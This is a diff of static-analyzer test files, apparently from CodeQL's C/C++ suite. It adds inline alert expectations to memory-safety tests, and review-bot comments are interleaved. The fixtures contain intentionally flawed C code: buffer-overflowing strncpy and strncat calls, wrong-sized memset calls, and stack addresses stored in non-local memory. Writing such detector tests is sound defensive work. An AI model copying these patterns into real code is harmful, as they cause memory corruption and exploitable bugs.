@@ -166,27 +166,27 @@ void test301() { int b2[14][15]; int b3[13][14][15]; - s.p1 = b1; // BAD: address of local variable stored in non-local memory. - s.p1 = &b1[1]; // BAD: address of local variable stored in non-local memory. - - s.p2 = b2; // BAD: address of local variable stored in non-local memory. - s.p2 = &b2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = b2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - - s.p3 = b3; // BAD: address of local variable stored in non-local memory. - s.p3 = &b3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = b3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = &b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. - - s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.p1 = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.p2 = b2; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = b2[1]; // BAD: address of local variable stored in non-local memory. 
// $ Alert + s.p1 = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.p3 = b3; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p3 = &b3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = b3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test302() { 
@@ -212,41 +212,41 @@ void test302() { // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test303() { static S300 s; S300 x; - s.p1 = x.a1; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a1[1]; // BAD: address of local variable stored in non-local memory. + s.p1 = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert - s.p2 = x.a2; // BAD: address of local variable stored in non-local memory. - s.p2 = &x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. + s.p2 = x.a2; // BAD: address of local variable stored in non-local memory. 
// $ Alert + s.p2 = &x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert - s.p3 = x.a3; // BAD: address of local variable stored in non-local memory. - s.p3 = &x.a3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = x.a3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = &x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.p3 = x.a3; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p3 = &x.a3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = x.a3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. 
+ s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test304() { @@ -270,12 +270,12 @@ void test304() { // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } struct S400 { 
@@ -309,11 +309,11 @@ int test400() { s.p0 = &x; // GOOD: s.p0 is on the stack. s.p1[1] = &x; // GOOD: s.p1 is on the stack. s.p2[1][2] = &x; // GOOD: s.p1 is on the stack. - s.q1[1] = &x; // BAD: pointer indirection to the heap. - s.q2[1][2] = &x; // BAD: pointer indirection to the heap. - s.q3[1][2][3] = &x; // BAD: pointer indirection to the heap. - s.r2[1][2] = &x; // BAD: pointer indirection to the heap. - s.r3[1][2][3] = &x; // BAD: pointer indirection to the heap. + s.q1[1] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.q2[1][2] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.q3[1][2][3] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.r2[1][2] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.r3[1][2][3] = &x; // BAD: pointer indirection to the heap. // $ Alert return x; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref index bf0bf1ea7d05..3a2ef158d3d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c index 2ed60b96315e..bba5318fc328 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c 
@@ -19,7 +19,7 @@ void good0(char *arg) { void bad0(char *arg) { char buf[80]; // BAD: Checks size of source - strncpy(buf, arg, strlen(arg)); + strncpy(buf, arg, strlen(arg)); // $ Alert } @@ -30,6 +30,6 @@ void good1(const char *buf, char *arg) { void bad1(const char *buf, char *arg) { // BAD: Checks size of source - strncpy(buf, arg, strlen(arg)); + strncpy(buf, arg, strlen(arg)); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp index ad2e39b748e2..89fcbc432edc 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp @@ -18,9 +18,9 @@ void test1() const char *str = "01234567890123456789"; strncpy(buf1, str, sizeof(buf1)); - strncpy(buf1, str, strlen(str)); // BAD - strncpy(buf1, str, strlen(str) + 1); // BAD - strncpy(buf1, buf2, sizeof(buf2)); // BAD + strncpy(buf1, str, strlen(str)); // BAD // $ Alert + strncpy(buf1, str, strlen(str) + 1); // BAD // $ Alert + strncpy(buf1, buf2, sizeof(buf2)); // BAD // $ Alert } void test2() 
@@ -29,12 +29,12 @@ void test2() wchar_t buf2[20]; const wchar_t *str = L"01234567890123456789"; - wcsncpy(buf1, str, sizeof(buf1)); // (bad, but not a strncpyflippedargs bug) + wcsncpy(buf1, str, sizeof(buf1)); // (bad, but not a strncpyflippedargs bug) // $ Alert wcsncpy(buf1, str, sizeof(buf1) / sizeof(wchar_t)); - wcsncpy(buf1, str, wcslen(str)); // BAD - wcsncpy(buf1, str, wcslen(str) + 1); // BAD - wcsncpy(buf1, buf2, sizeof(buf2)); // BAD - wcsncpy(buf1, buf2, sizeof(buf2) / sizeof(wchar_t)); // BAD [NOT DETECTED] + wcsncpy(buf1, str, wcslen(str)); // BAD // $ Alert + wcsncpy(buf1, str, wcslen(str) + 1); // BAD // $ Alert + wcsncpy(buf1, buf2, sizeof(buf2)); // BAD // $ Alert + wcsncpy(buf1, buf2, sizeof(buf2) / sizeof(wchar_t)); // BAD [NOT DETECTED] // $ Alert } void test3() @@ -44,9 +44,9 @@ void test3() const char *str = "01234567890123456789"; strcpy_s(buf1, sizeof(buf1), str); - strcpy_s(buf1, strlen(str), str); // BAD - strcpy_s(buf1, strlen(str) + 1, str); // BAD - strcpy_s(buf1, sizeof(buf2), buf2); // BAD + strcpy_s(buf1, strlen(str), str); // BAD // $ Alert + strcpy_s(buf1, strlen(str) + 1, str); // BAD // $ Alert + strcpy_s(buf1, sizeof(buf2), buf2); // BAD // $ Alert } struct S { @@ -59,10 +59,10 @@ void test4(S *a, S *b) { strncpy(a->x, b->x, sizeof(a->x)); // GOOD strncpy(a->x, b->x, sizeof(b->x)); // GOOD (sizes match, so it's ok) - strncpy(a->x, b->z, sizeof(b->z)); // BAD + strncpy(a->x, b->z, sizeof(b->z)); // BAD // $ Alert strncpy(a->y, b->y, strlen(a->y) + 1); // GOOD - strncpy(a->y, b->y, strlen(b->y) + 1); // BAD + strncpy(a->y, b->y, strlen(b->y) + 1); // BAD // $ Alert } void test5(char *buf) 
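Review bot: The last `wcsncpy` line in the `test2` hunk now contradicts itself, because it keeps the `[NOT DETECTED]` marker while the new annotation expects an alert: `wcsncpy(buf1, buf2, sizeof(buf2) / sizeof(wchar_t)); // BAD [NOT DETECTED] // $ Alert`. If the query really reports this call, the prose marker is stale and the line should read `// BAD // $ Alert`. If it does not, the expectation should be `// $ MISSING: Alert`. The first `wcsncpy` in the same hunk is similar: its comment says it is not a StrncpyFlippedArgs bug, yet it carries a plain `$ Alert`, so it is worth confirming which query the alert is meant to come from. The body of `test2` starts outside the hunk.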
@@ -78,10 +78,10 @@ void test6(T *a, T *b) { strncpy(a->s->x, b->s->x, sizeof(a->s->x)); // GOOD strncpy(a->s->x, b->s->x, sizeof(b->s->x)); // GOOD (sizes match, so it's ok) - strncpy(a->s->x, b->s->x, sizeof(b->s->z)); // BAD + strncpy(a->s->x, b->s->x, sizeof(b->s->z)); // BAD // $ Alert strncpy(a->s->y, b->s->y, strlen(a->s->y) + 1); // GOOD - strncpy(a->s->y, b->s->y, strlen(b->s->y) + 1); // BAD + strncpy(a->s->y, b->s->y, strlen(b->s->y) + 1); // BAD // $ Alert } void test7(char* x, char* y) { @@ -102,10 +102,10 @@ void test9() wchar_t buf2[20]; const wchar_t *str = L"01234567890123456789"; - wcsxfrm_l(buf1, str, sizeof(buf1), nullptr); // BAD (but not a StrncpyFlippedArgs bug) + wcsxfrm_l(buf1, str, sizeof(buf1), nullptr); // BAD (but not a StrncpyFlippedArgs bug) // $ Alert wcsxfrm_l(buf1, str, sizeof(buf1) / sizeof(wchar_t), nullptr); // GOOD - wcsxfrm_l(buf1, str, wcslen(str), nullptr); // BAD - wcsxfrm_l(buf1, str, wcslen(str) + 1, nullptr); // BAD - wcsxfrm_l(buf1, buf2, sizeof(buf2), nullptr); // BAD - wcsxfrm_l(buf1, buf2, sizeof(buf2) / sizeof(wchar_t), nullptr); // BAD + wcsxfrm_l(buf1, str, wcslen(str), nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, str, wcslen(str) + 1, nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, buf2, sizeof(buf2), nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, buf2, sizeof(buf2) / sizeof(wchar_t), nullptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref index ab987b824e42..8a03a49d34e3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref 
@@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousCallToMemset.ql \ No newline at end of file +query: Likely Bugs/Memory Management/SuspiciousCallToMemset.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c index 1acf9e8e566b..f13ea2624034 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c @@ -26,7 +26,7 @@ void tests() struct T *t2 = (struct T*)malloc(sizeof(struct T)); // the size of the struct is probably intended // but this takes the size of a pointer - memset(t2, 0, sizeof(t2)); // BAD + memset(t2, 0, sizeof(t2)); // BAD // $ Alert // correct but discouraged, use sizeof(struct T) instead memset(t1, 0, sizeof(*t2)); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp index 6a8c8f904a79..a764eb799bb9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp 
@@ -23,37 +23,37 @@ int main() memset(&ms, 0, sizeof(myStruct)); // GOOD memset(&ms, 0, sizeof(ms)); // GOOD memset(&ms, 0, 8); // BAD [NOT DETECTED] - memset(&ms, 0, sizeof(otherStruct)); // BAD + memset(&ms, 0, sizeof(otherStruct)); // BAD // $ Alert { myStruct *msPtr = &ms; void *vPtr = msPtr; - memset(&msPtr, 0, sizeof(myStruct)); // BAD + memset(&msPtr, 0, sizeof(myStruct)); // BAD // $ Alert memset(&msPtr, 0, sizeof(myStruct *)); // GOOD - memset(&msPtr, 0, sizeof(*msPtr)); // BAD + memset(&msPtr, 0, sizeof(*msPtr)); // BAD // $ Alert memset(&msPtr, 0, sizeof(msPtr)); // GOOD memset(msPtr, 0, sizeof(myStruct)); // GOOD - memset(msPtr, 0, sizeof(myStruct *)); // BAD + memset(msPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(msPtr, 0, sizeof(*msPtr)); // GOOD - memset(msPtr, 0, sizeof(msPtr)); // BAD + memset(msPtr, 0, sizeof(msPtr)); // BAD // $ Alert memset(vPtr, 0, sizeof(myStruct)); // GOOD - memset(vPtr, 0, sizeof(myStruct *)); // BAD + memset(vPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(vPtr, 0, sizeof(*msPtr)); // GOOD - memset(vPtr, 0, sizeof(msPtr)); // BAD + memset(vPtr, 0, sizeof(msPtr)); // BAD // $ Alert { myStruct **msPtrPtr = &msPtr; - memset(&msPtrPtr, 0, sizeof(myStruct)); // BAD - memset(&msPtrPtr, 0, sizeof(myStruct *)); // BAD + memset(&msPtrPtr, 0, sizeof(myStruct)); // BAD // $ Alert + memset(&msPtrPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(&msPtrPtr, 0, sizeof(myStruct **)); // GOOD - memset(msPtrPtr, 0, sizeof(myStruct)); // BAD + memset(msPtrPtr, 0, sizeof(myStruct)); // BAD // $ Alert memset(msPtrPtr, 0, sizeof(myStruct *)); // GOOD - memset(msPtrPtr, 0, sizeof(myStruct **)); // BAD + memset(msPtrPtr, 0, sizeof(myStruct **)); // BAD // $ Alert memset(*msPtrPtr, 0, sizeof(myStruct)); // GOOD - memset(*msPtrPtr, 0, sizeof(myStruct *)); // BAD - memset(*msPtrPtr, 0, sizeof(myStruct **)); // BAD + memset(*msPtrPtr, 0, sizeof(myStruct *)); // BAD // $ Alert + memset(*msPtrPtr, 0, sizeof(myStruct **)); // BAD // $ 
Alert } } } 
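Review bot: The context line `memset(&ms, 0, 8); // BAD [NOT DETECTED]` at the top of this `main` hunk gets no inline expectation, so the known false negative is still recorded only in prose. I would encode it as `memset(&ms, 0, 8); // BAD // $ MISSING: Alert`, which lets the inline-expectations postprocess track the gap. The same applies to `memset(msPtrArr, 0, sizeof(myStruct) * NUM); // BAD [NOT DETECTED]` in the `-65,40` hunk, the `[NOT DETECTED]` line in the `myFunc` hunk, and `strncat(buf, ".", 1); // BAD [NOT DETECTED]` in SuspiciousCallToStrncat/test.c. These are memory-safety queries, so a machine-readable record of what they miss is more useful than a free-text tag.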
@@ -65,40 +65,40 @@ int main() memset(&msArr, 0, sizeof(myStruct) * NUM); // GOOD memset(&msArr, 0, sizeof(msArr)); // GOOD memset(&msArr, 0, sizeof(myStruct[NUM])); // GOOD - memset(&msArr, 0, sizeof(myStruct *)); // BAD + memset(&msArr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(msArr, 0, sizeof(myStruct) * NUM); // GOOD memset(msArr, 0, sizeof(msArr)); // GOOD memset(msArr, 0, sizeof(myStruct[NUM])); // GOOD - memset(msArr, 0, sizeof(myStruct *)); // BAD + memset(msArr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(&(msArr[0]), 0, sizeof(myStruct) * NUM); // GOOD memset(&(msArr[0]), 0, sizeof(msArr)); // GOOD memset(&(msArr[0]), 0, sizeof(myStruct[NUM])); // GOOD - memset(&(msArr[0]), 0, sizeof(myStruct *)); // BAD + memset(&(msArr[0]), 0, sizeof(myStruct *)); // BAD // $ Alert memset(msPtr, 0, sizeof(myStruct) * NUM); // GOOD memset(msPtr, 0, sizeof(msArr)); // GOOD memset(msPtr, 0, sizeof(myStruct[NUM])); // GOOD - memset(msPtr, 0, sizeof(myStruct *)); // BAD + memset(msPtr, 0, sizeof(myStruct *)); // BAD // $ Alert } { myStructPtr msPtrArr[NUM]; - memset(&msPtrArr, 0, sizeof(myStruct) * NUM); // BAD + memset(&msPtrArr, 0, sizeof(myStruct) * NUM); // BAD // $ Alert memset(&msPtrArr, 0, sizeof(myStruct *) * NUM); // GOOD memset(&msPtrArr, 0, sizeof(myStructPtr) * NUM); // GOOD - memset(&msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD + memset(&msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD // $ Alert memset(msPtrArr, 0, sizeof(myStruct) * NUM); // BAD [NOT DETECTED] memset(msPtrArr, 0, sizeof(myStruct *) * NUM); // GOOD memset(msPtrArr, 0, sizeof(myStructPtr) * NUM); // GOOD - memset(msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD - memset(&(msPtrArr[0]), 0, sizeof(myStruct) * NUM); // BAD + memset(msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD // $ Alert + memset(&(msPtrArr[0]), 0, sizeof(myStruct) * NUM); // BAD // $ Alert memset(&(msPtrArr[0]), 0, sizeof(myStruct *) * NUM); // GOOD memset(&(msPtrArr[0]), 0, sizeof(myStructPtr) * NUM); // GOOD - 
memset(&(msPtrArr[0]), 0, sizeof(myStruct **) * NUM); // BAD + memset(&(msPtrArr[0]), 0, sizeof(myStruct **) * NUM); // BAD // $ Alert memset(msPtrArr[0], 0, sizeof(myStruct) * NUM); // GOOD - memset(msPtrArr[0], 0, sizeof(myStruct *) * NUM); // BAD - memset(msPtrArr[0], 0, sizeof(myStructPtr) * NUM); // BAD - memset(msPtrArr[0], 0, sizeof(myStruct **) * NUM); // BAD + memset(msPtrArr[0], 0, sizeof(myStruct *) * NUM); // BAD // $ Alert + memset(msPtrArr[0], 0, sizeof(myStructPtr) * NUM); // BAD // $ Alert + memset(msPtrArr[0], 0, sizeof(myStruct **) * NUM); // BAD // $ Alert } { @@ -126,13 +126,13 @@ void myFunc(myStruct paramArray[80], myStruct &refStruct) memset(&localArray, 0, sizeof(localArray)); // GOOD memset(paramArray, 0, sizeof(myStruct) * 80); // GOOD - memset(paramArray, 0, sizeof(paramArray)); // GOOD [FALSE POSITIVE] - memset(¶mArray, 0, sizeof(myStruct) * 80); // BAD + memset(paramArray, 0, sizeof(paramArray)); // GOOD [FALSE POSITIVE] // $ Alert + memset(¶mArray, 0, sizeof(myStruct) * 80); // BAD // $ Alert memset(¶mArray, 0, sizeof(paramArray)); // BAD [NOT DETECTED] memset(&refStruct, 0, sizeof(myStruct)); // GOOD memset(&refStruct, 0, sizeof(refStruct)); // GOOD - memset(&refStruct, 0, sizeof(myStruct *)); // BAD + memset(&refStruct, 0, sizeof(myStruct *)); // BAD // $ Alert } class MyClass @@ -167,9 +167,9 @@ void more_tests_2() intArrayPointer iapa[88]; memset(iap, 0, sizeof(intArray)); // GOOD - memset(&iap, 0, sizeof(intArray)); // BAD + memset(&iap, 0, sizeof(intArray)); // BAD // $ Alert memset(iapa, 0, sizeof(iapa)); // GOOD - memset(iapa, 0, sizeof(intArrayPointer *)); // BAD + memset(iapa, 0, sizeof(intArrayPointer *)); // BAD // $ Alert } void more_tests_3() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref index 37583da5e482..ed09b7cd912d 100644 
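Review bot: In the `myFunc` hunk, `memset(paramArray, 0, sizeof(paramArray)); // GOOD [FALSE POSITIVE] // $ Alert` records a result the authors consider wrong as an ordinary expected alert. The inline-expectations form for that is `// $ SPURIOUS: Alert`, which keeps the test passing and marks the result as one to fix. The two `strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] // $ Alert` lines in the `strncat_test6` hunks of SuspiciousCallToStrncat/test.c need the same change. Separately, the GOOD label on the `paramArray` line deserves a second look: `sizeof` of an array parameter is the pointer size, and the SuspiciousSizeof tests in this commit mark that same pattern BAD (`void f2(char s[10]) { int size = sizeof(s); // BAD`).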
--- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousCallToStrncat.ql +query: Likely Bugs/Memory Management/SuspiciousCallToStrncat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c index 13c18b75dbb4..0ea05c6bf183 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c @@ -21,7 +21,7 @@ void good0(char *s) { void bad0(char *s) { char buf[80]; strcpy(buf, "s = "); - strncat(buf, s, sizeof(buf)); // BAD -- Forgot to allow for "s = " + strncat(buf, s, sizeof(buf)); // BAD -- Forgot to allow for "s = " // $ Alert strncat(buf, ".", 1); // BAD [NOT DETECTED] -- there might not be even 1 character of space } @@ -42,7 +42,7 @@ void bad1(char *s) { void strncat_test1(char *s) { char buf[80]; strncat(buf, s, sizeof(buf) - strlen(buf) - 1); // GOOD - strncat(buf, s, sizeof(buf) - strlen(buf)); // BAD + strncat(buf, s, sizeof(buf) - strlen(buf)); // BAD // $ Alert } void* malloc(size_t); @@ -64,7 +64,7 @@ void strncat_test3(char* s, struct buffers* buffers) { unsigned len_array = strlen(buffers->array); unsigned max_size = sizeof(buffers->array); unsigned free_size = max_size - len_array; - strncat(buffers->array, s, free_size); // BAD + strncat(buffers->array, s, free_size); // BAD // $ Alert } #define MAX_SIZE 80 
@@ -72,8 +72,8 @@ void strncat_test3(char* s, struct buffers* buffers) { void strncat_test4(char *s) { char buf[MAX_SIZE]; strncat(buf, s, MAX_SIZE - strlen(buf) - 1); // GOOD - strncat(buf, s, MAX_SIZE - strlen(buf)); // BAD - strncat(buf, "...", MAX_SIZE - strlen(buf)); // BAD + strncat(buf, s, MAX_SIZE - strlen(buf)); // BAD // $ Alert + strncat(buf, "...", MAX_SIZE - strlen(buf)); // BAD // $ Alert } void strncat_test5(char *s) { @@ -88,7 +88,7 @@ void strncat_test6() { char dest[60]; dest[0] = '\0'; // Will write `dest[0 .. 5]` - strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] + strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] // $ Alert } { @@ -96,6 +96,6 @@ void strncat_test6() { memset(dest, 'a', sizeof(dest)); dest[54] = '\0'; // Will write `dest[54 .. 59]` - strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] + strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] // $ Alert } } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref index b31c76e45832..846e202a48ad 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousSizeof.ql \ No newline at end of file +query: Likely Bugs/Memory Management/SuspiciousSizeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp index f782badb55ac..82da4edd17e4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp 
